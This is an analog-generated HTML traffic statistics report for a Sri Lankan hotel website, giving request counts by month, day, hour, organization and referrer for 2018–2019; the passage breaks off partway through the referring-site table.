<?xml version="1.0" encoding="ISO-8859-1"?>
<?xml-stylesheet href="#internalStyle" type="text/css"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
	"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Web Server Statistics for ellensplace.freudenbergleisure.com</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<meta name="robots" content="noindex,nofollow" />
<meta name="generator" content="analog 6.0/Unix" />
<style type="text/css" id="internalStyle">
h2 {
	background-color: #A0C0F0;
	width: 98%;
	padding: 3px 6px;
}
table {
	text-align: right;
	margin-left: 30px;
	background-color: #D0E0F0;
	border-collapse: collapse;
}
th {
	border-bottom: 1px solid #404050;
	border-right: 1px dotted #606070;
	border-top: none;
	border-left: none;
	padding: 0px 5px 1px 5px;
	font-weight: bold;
	background-color: #A0C0F0;
}
td {
	padding: 0px 5px 1px 5px;
	border-right: 1px dotted #606070;
	border-left: none;
	border-bottom: none;
	border-top:none;
}
td.x {
	font-family: monospace;
	white-space: pre;
}
.xl {
	text-align: left;
	border-right: none;
}
.xr {
	text-align: right;
	border-right: none;
}
.bar {
	text-align: left;
	border-right: none;
}
tr.sub {background-color: #C0C0FF;
	font-style: italic;
}
.repdesc {
	font-style: italic;
}
.repspan {
	font-style: italic;
}
.goto {
	font-size: small;
}
.gensumtitle {
	font-weight: bold;
}
.gototitle {
	font-weight: bold;
}
.runtimetitle {
	font-weight: bold;
}
img {
	border-style: none;
}
a:link {
	color: blue;
	text-decoration: none;
}
a:visited {
	color: purple;
	text-decoration: none;
}
a:link:hover {
	text-decoration: underline;
}
a:visited:hover {
	text-decoration: underline;
}
a:link:active {
	color: red;
	text-decoration: underline;
}
a:visited:active {
	color: red;
	text-decoration: underline;
}
</style>
</head>
<body>
<div class="header"><h1><a name="Top" id="Top" href="http://www.analog.cx/"><img src="/images/analogo.png" alt="" /></a> Web Server Statistics for <a href="http://ellensplace.freudenbergleisure.com/">ellensplace.freudenbergleisure.com</a></h1>

<p class="analysisspan">Program started on Tue, Apr 30 2019 at  5:40 PM.
<br />Analyzed requests from Wed, Feb 28 2018 at  8:37 PM to Tue, Apr 30 2019 at  5:28 PM (425.87 days).</p>
</div>
<div class="gensum"><h2><a name="gensum" id="gensum">General Summary</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | General Summary | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p class="lastseven">Figures in parentheses refer to the 7-day period ending Apr 30 2019 at  5:40 PM.</p>
<p class="gensumlines">
<span class="gensumtitle">Successful requests:</span> 71,179 (1,157)
<br /><span class="gensumtitle">Average successful requests per day:</span> 167 (165)
<br /><span class="gensumtitle">Successful requests for pages:</span> 18,962 (353)
<br /><span class="gensumtitle">Average successful requests for pages per day:</span> 44 (50)
<br /><span class="gensumtitle">Failed requests:</span> 1 (0)
<br /><span class="gensumtitle">Redirected requests:</span> 32,415 (115)
<br /><span class="gensumtitle">Distinct files requested:</span> 454 (3,011)
<br /><span class="gensumtitle">Distinct hosts served:</span> 9,088 (10,625)
<br /><span class="gensumtitle">Data transferred:</span> 2.69 gigabytes (45.44 megabytes)
<br /><span class="gensumtitle">Average data transferred per day:</span> 6.46 megabytes (6.49 megabytes)
</p>
</div><div class="month"><h2><a name="month" id="month">Monthly Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | Monthly Report | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 60 requests for pages or part thereof.</p>
<table>
<thead><tr><th class="x">month</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar">&nbsp;</th></tr></thead>
<tbody><tr><td class="x">Feb 2018</td><td class="R">26</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr>
<tr><td class="x">Mar 2018</td><td class="R">4842</td><td class="P">306</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">Apr 2018</td><td class="R">4414</td><td class="P">294</td><td class="bar"><img src="/images/barb4.png" alt="+++++" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">May 2018</td><td class="R">7195</td><td class="P">1790</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">Jun 2018</td><td class="R">4493</td><td class="P">1176</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr>
<tr><td class="x">Jul 2018</td><td class="R">4705</td><td class="P">1230</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">Aug 2018</td><td class="R">4899</td><td class="P">1511</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">Sep 2018</td><td class="R">4078</td><td class="P">1278</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">Oct 2018</td><td class="R">4487</td><td class="P">1128</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">Nov 2018</td><td class="R">3435</td><td class="P">1078</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">Dec 2018</td><td class="R">4636</td><td class="P">1670</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr>
<tr><td class="x">&nbsp;</td><td class="R">&nbsp;</td><td class="P">&nbsp;</td><td class="bar">&nbsp;</td></tr>
<tr><td class="x">Jan 2019</td><td class="R">7276</td><td class="P">2344</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /></td></tr>
<tr><td class="x">Feb 2019</td><td class="R">6147</td><td class="P">1993</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">Mar 2019</td><td class="R">5926</td><td class="P">1710</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">Apr 2019</td><td class="R">4620</td><td class="P">1453</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
</tbody></table>
<p class="busiesttime">Busiest month: Jan 2019 (2,344 requests for pages).</p>
</div><div class="daysum"><h2><a name="daysum" id="daysum">Daily Summary</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | Daily Summary | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 80 requests for pages or part thereof.</p>
<table>
<thead><tr><th class="x">day</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar">&nbsp;</th></tr></thead>
<tbody><tr><td class="x">Sun</td><td class="R">9057</td><td class="P">2236</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr>
<tr><td class="x">Mon</td><td class="R">9708</td><td class="P">2765</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">Tue</td><td class="R">10607</td><td class="P">2645</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">Wed</td><td class="R">11702</td><td class="P">3024</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">Thu</td><td class="R">10502</td><td class="P">2941</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">Fri</td><td class="R">10329</td><td class="P">2829</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr>
<tr><td class="x">Sat</td><td class="R">9274</td><td class="P">2522</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++" /></td></tr>
</tbody></table>
</div><div class="hoursum"><h2><a name="hoursum" id="hoursum">Hourly Summary</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | Hourly Summary | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 25 requests for pages or part thereof.</p>
<table>
<thead><tr><th class="x">hour</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar">&nbsp;</th></tr></thead>
<tbody><tr><td class="x"> 0</td><td class="R">2256</td><td class="P">690</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr>
<tr><td class="x"> 1</td><td class="R">2593</td><td class="P">675</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x"> 2</td><td class="R">2379</td><td class="P">604</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x"> 3</td><td class="R">2442</td><td class="P">620</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x"> 4</td><td class="R">2026</td><td class="P">595</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /></td></tr>
<tr><td class="x"> 5</td><td class="R">2165</td><td class="P">599</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /></td></tr>
<tr><td class="x"> 6</td><td class="R">2295</td><td class="P">663</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x"> 7</td><td class="R">2439</td><td class="P">702</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x"> 8</td><td class="R">2433</td><td class="P">705</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x"> 9</td><td class="R">2721</td><td class="P">845</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">10</td><td class="R">3515</td><td class="P">903</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">11</td><td class="R">3434</td><td class="P">985</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /></td></tr>
<tr><td class="x">12</td><td class="R">4069</td><td class="P">985</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /></td></tr>
<tr><td class="x">13</td><td class="R">4113</td><td class="P">1045</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">14</td><td class="R">3533</td><td class="P">1041</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">15</td><td class="R">3588</td><td class="P">944</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">16</td><td class="R">4304</td><td class="P">943</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">17</td><td class="R">3326</td><td class="P">883</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr>
<tr><td class="x">18</td><td class="R">2713</td><td class="P">793</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++" /></td></tr>
<tr><td class="x">19</td><td class="R">2806</td><td class="P">804</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">20</td><td class="R">3496</td><td class="P">779</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++" /></td></tr>
<tr><td class="x">21</td><td class="R">2824</td><td class="P">736</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">22</td><td class="R">2868</td><td class="P">708</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">23</td><td class="R">2841</td><td class="P">715</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
</tbody></table>
</div><div class="dom"><h2><a name="dom" id="dom">Domain Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | Domain Report | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./dom.png" alt="" /></p>
<p class="whatinc">
Listing domains, sorted by the amount of traffic.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">domain</th></tr></thead>
<tbody><tr><td class="R">69450</td><td class="b">96.96%</td><td class="xl">[unresolved numerical addresses]</td></tr>
<tr><td class="R">1729</td><td class="b"> 3.04%</td><td class="xl">[domain not given]</td></tr>
</tbody></table>
</div><div class="org"><h2><a name="org" id="org">Organization Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | Organization Report | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./org.png" alt="" /></p>
<p class="whatinc">
Listing the top 20 organizations by the number of requests, sorted by the number of requests.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">organization</th></tr></thead>
<tbody><tr><td class="R">13489</td><td class="b">18.85%</td><td class="xl">10</td></tr>
<tr><td class="R">12355</td><td class="b">17.01%</td><td class="xl">162.158</td></tr>
<tr><td class="R">10761</td><td class="b">13.51%</td><td class="xl">172.68</td></tr>
<tr><td class="R">6072</td><td class="b">10.26%</td><td class="xl">172.31</td></tr>
<tr><td class="R">4570</td><td class="b"> 6.12%</td><td class="xl">108</td></tr>
<tr><td class="R">3653</td><td class="b"> 5.02%</td><td class="xl">172.69</td></tr>
<tr><td class="R">2871</td><td class="b"> 4.74%</td><td class="xl">141.101</td></tr>
<tr><td class="R">1729</td><td class="b"> 3.04%</td><td class="xl">[domain not given]</td></tr>
<tr><td class="R">1211</td><td class="b"> 1.38%</td><td class="xl">66.249</td></tr>
<tr><td class="R">677</td><td class="b"> 0.79%</td><td class="xl">35</td></tr>
<tr><td class="R">557</td><td class="b"> 0.84%</td><td class="xl">112</td></tr>
<tr><td class="R">503</td><td class="b"> 0.76%</td><td class="xl">40</td></tr>
<tr><td class="R">457</td><td class="b"> 0.48%</td><td class="xl">173.245</td></tr>
<tr><td class="R">415</td><td class="b"> 0.46%</td><td class="xl">18</td></tr>
<tr><td class="R">408</td><td class="b"> 0.56%</td><td class="xl">207.46</td></tr>
<tr><td class="R">360</td><td class="b"> 0.39%</td><td class="xl">46</td></tr>
<tr><td class="R">347</td><td class="b"> 0.49%</td><td class="xl">157.55</td></tr>
<tr><td class="R">285</td><td class="b"> 0.32%</td><td class="xl">54</td></tr>
<tr><td class="R">243</td><td class="b"> 0.50%</td><td class="xl">103</td></tr>
<tr><td class="R">239</td><td class="b"> 0.35%</td><td class="xl">124</td></tr>
<tr><td class="R">9977</td><td class="b">14.11%</td><td class="xl">[not listed: 378 organizations]</td></tr>
</tbody></table>
</div><div class="redirref"><h2><a name="redirref" id="redirref">Redirected Referrer Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | Redirected Referrer Report | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./redirref.png" alt="" /></p>
<p class="whatinc">
Listing the top 30 referring URLs by the number of redirected requests, sorted by the number of redirected requests.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead>
<tbody><tr><td class="R">854</td><td class="xl"><a href="https://ellensplace.freudenbergleisure.com/assets/css/ellens_main.css">https://ellensplace.freudenbergleisure.com/assets/css/ellens_main.css</a></td></tr>
<tr><td class="R">548</td><td class="xl"><a href="https://ellensplace.freudenbergleisure.com/about-us">https://ellensplace.freudenbergleisure.com/about-us</a></td></tr>
<tr><td class="R">428</td><td class="xl"><a href="https://ellensplace.freudenbergleisure.com/">https://ellensplace.freudenbergleisure.com/</a></td></tr>
<tr><td class="R">328</td><td class="xl"><a href="https://ellensplace.freudenbergleisure.com/assets/css/jquery-ui.css">https://ellensplace.freudenbergleisure.com/assets/css/jquery-ui.css</a></td></tr>
<tr><td class="R">318</td><td class="xl"><a href="http://www.google.com.hk/">http://www.google.com.hk/</a></td></tr>
<tr><td class="R">264</td><td class="xl"><a href="https://ellensplace.freudenbergleisure.com/gallery">https://ellensplace.freudenbergleisure.com/gallery</a></td></tr>
<tr><td class="R">136</td><td class="xl"><a href="http://ellensplace.lk/">http://ellensplace.lk/</a></td></tr>
<tr><td class="R">114</td><td class="xl"><a href="http://ellens-place.com/wp-login.php">http://ellens-place.com/wp-login.php</a></td></tr>
<tr><td class="R">106</td><td class="xl"><a href="http://ellensplace.lk/wp-login.php">http://ellensplace.lk/wp-login.php</a></td></tr>
<tr><td class="R">98</td><td class="xl"><a href="http://ellens-place.com/">http://ellens-place.com/</a></td></tr>
<tr><td class="R">90</td><td class="xl"><a href="https://ellensplace.freudenbergleisure.com/accommodation/standard-rooms">https://ellensplace.freudenbergleisure.com/accommodation/standard-rooms</a></td></tr>
<tr><td class="R">79</td><td class="xl"><a href="http://www.ellensplace.lk/">http://www.ellensplace.lk/</a></td></tr>
<tr><td class="R">74</td><td class="xl"><a href="https://ellensplace.freudenbergleisure.com/accommodation/super-deluxe-rooms">https://ellensplace.freudenbergleisure.com/accommodation/super-deluxe-rooms</a></td></tr>
<tr><td class="R">63</td><td class="xl"><a href="https://ellensplace.freudenbergleisure.com/accommodation/deluxe-rooms">https://ellensplace.freudenbergleisure.com/accommodation/deluxe-rooms</a></td></tr>
<tr><td class="R">46</td><td class="xl"><a href="https://ellensplace.freudenbergleisure.com/suites.php">https://ellensplace.freudenbergleisure.com/suites.php</a></td></tr>
<tr><td class="R">45</td><td class="xl"><a href="https://ellensplace.freudenbergleisure.com/facilities/restaurant">https://ellensplace.freudenbergleisure.com/facilities/restaurant</a></td></tr>
<tr><td class="R">30</td><td class="xl"><a href="http://www.ellens-place.com/about-us.php">http://www.ellens-place.com/about-us.php</a></td></tr>
<tr><td class="R">22</td><td class="xl"><a href="https://ellensplace.freudenbergleisure.com/swimming-pool.php">https://ellensplace.freudenbergleisure.com/swimming-pool.php</a></td></tr>
<tr><td class="R">21</td><td class="xl"><a href="http://ellens-place.com/user/login">http://ellens-place.com/user/login</a></td></tr>
<tr><td class="R">20</td><td class="xl"><a href="http://ellensplace.lk/user/user_upfile.asp">http://ellensplace.lk/user/user_upfile.asp</a></td></tr>
<tr class="sub level2"><td class="R">20</td><td class="xl">&nbsp;&nbsp;<a href="http://ellensplace.lk/user/user_upfile.asp?channelid=2&amp;Type=Pic">http://ellensplace.lk/user/user_upfile.asp?channelid=2&amp;Type=Pic</a></td></tr>
<tr><td class="R">18</td><td class="xl"><a href="https://google.com/">https://google.com/</a></td></tr>
<tr><td class="R">18</td><td class="xl"><a href="https://ellensplace.freudenbergleisure.com/facilities/swimming-pool">https://ellensplace.freudenbergleisure.com/facilities/swimming-pool</a></td></tr>
<tr><td class="R">16</td><td class="xl"><a href="https://freudenbergleisure.com/page-not-found/">https://freudenbergleisure.com/page-not-found/</a></td></tr>
<tr><td class="R">15</td><td class="xl"><a href="http://ellens-place.com/sites/all/libraries/elfinder/connectors/php/connector.php">http://ellens-place.com/sites/all/libraries/elfinder/connectors/php/connector.php</a></td></tr>
<tr><td class="R">15</td><td class="xl"><a href="http://ellensplace.freudenbergleisure.com/sites/all/libraries/elfinder/connectors/php/connector.php">http://ellensplace.freudenbergleisure.com/sites/all/libraries/elfinder/connectors/php/connector.php</a></td></tr>
<tr><td class="R">14</td><td class="xl"><a href="http://ellensplace.freudenbergleisure.com/sites/all/libraries/elfinder/src/connectors/php/connector.php">http://ellensplace.freudenbergleisure.com/sites/all/libraries/elfinder/src/connectors/php/connector.php</a></td></tr>
<tr><td class="R">13</td><td class="xl"><a href="http://ellens-place.com/sites/all/libraries/plupload/examples/upload.php">http://ellens-place.com/sites/all/libraries/plupload/examples/upload.php</a></td></tr>
<tr><td class="R">12</td><td class="xl"><a href="http://ellensplace.freudenbergleisure.com/sites/all/libraries/elfinder/elfinder.html">http://ellensplace.freudenbergleisure.com/sites/all/libraries/elfinder/elfinder.html</a></td></tr>
<tr><td class="R">12</td><td class="xl"><a href="https://ellensplace.freudenbergleisure.com/ipms247.php">https://ellensplace.freudenbergleisure.com/ipms247.php</a></td></tr>
<tr><td class="R">12</td><td class="xl"><a href="http://ellens-place.com/user/user_upfile.asp">http://ellens-place.com/user/user_upfile.asp</a></td></tr>
<tr class="sub level2"><td class="R">12</td><td class="xl">&nbsp;&nbsp;<a href="http://ellens-place.com/user/user_upfile.asp?channelid=2&amp;Type=Pic">http://ellens-place.com/user/user_upfile.asp?channelid=2&amp;Type=Pic</a></td></tr>
<tr><td class="R">1086</td><td class="xl">[not listed: 708 URLs]</td></tr>
</tbody></table>
</div><div class="refsite"><h2><a name="refsite" id="refsite">Referring Site Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | Referring Site Report | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./refsite.png" alt="" /></p>
<p class="whatinc">
Listing the top 30 referring sites by the number of requests, sorted by the number of requests.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="xl">site</th></tr></thead>
<tbody><tr><td class="R">15362</td><td class="xl">http://www.ellensplace.lk/</td></tr>
<tr><td class="R">13484</td><td class="xl">https://ellensplace.freudenbergleisure.com/</td></tr>
<tr><td class="R">3706</td><td class="xl">http://ellensplace.lk/</td></tr>
<tr><td class="R">1331</td><td class="xl">http://ellens-place.com/</td></tr>
<tr><td class="R">1171</td><td class="xl">https://www.google.com/</td></tr>
<tr><td class="R">996</td><td class="xl">https://www.google.lk/</td></tr>
<tr><td class="R">430</td><td class="xl">http://www.ellens-place.com/</td></tr>
<tr><td class="R">421</td><td class="xl">http://www.freudenbergleisure.com/</td></tr>
<tr><td class="R">381</td><td class="xl">https://ellensplace.freudenbergleisure.lk/</td></tr>
<tr><td class="R">281</td><td class="xl">http://fsalk.com/</td></tr>
<tr><td class="R">226</td><td class="xl">http://www.fsalk.com/</td></tr>
<tr><td class="R">161</td><td class="xl">https://www.ellensplace.lk/</td></tr>
<tr><td class="R">132</td><td class="xl">http://freudenbergleisure.lk/</td></tr>
<tr><td class="R">131</td><td class="xl">https://ellensplace.lk/</td></tr>
<tr><td class="R">130</td><td class="xl">https://www.fsalk.com/</td></tr>
<tr><td class="R">124</td><td class="xl">http://ellensplace.freudenbergleisure.com/</td></tr>
